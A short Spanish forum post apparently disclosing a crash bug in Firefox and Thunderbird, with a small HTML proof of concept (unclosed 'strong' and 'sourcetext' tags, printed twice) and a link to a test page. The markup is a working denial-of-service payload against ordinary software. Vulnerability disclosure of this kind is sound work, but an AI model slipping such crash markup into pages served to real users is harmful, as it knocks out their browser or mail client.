En esta ocasión no hace falta un ataque extremadamente sofisticado: Firefox se bloquea con tan sólo hacerle cargar una página que contenga en su código las etiquetas strong y sourcetext sin sus correspondientes cierres.
También está afectado Mozilla Thunderbird, versión 1.0.6 incluida...
Código:
<html>
<body>
<strong>Mozilla<sourcetext>
</body>
</html>
<body>
<strong>Mozilla<sourcetext>
</body>
</html>
Prueba de concepto pa ra saber si tu browser es vulnerable:
http://ciberia.ya.com/webmousehack/bug2.html
Salu2










Autor


En línea


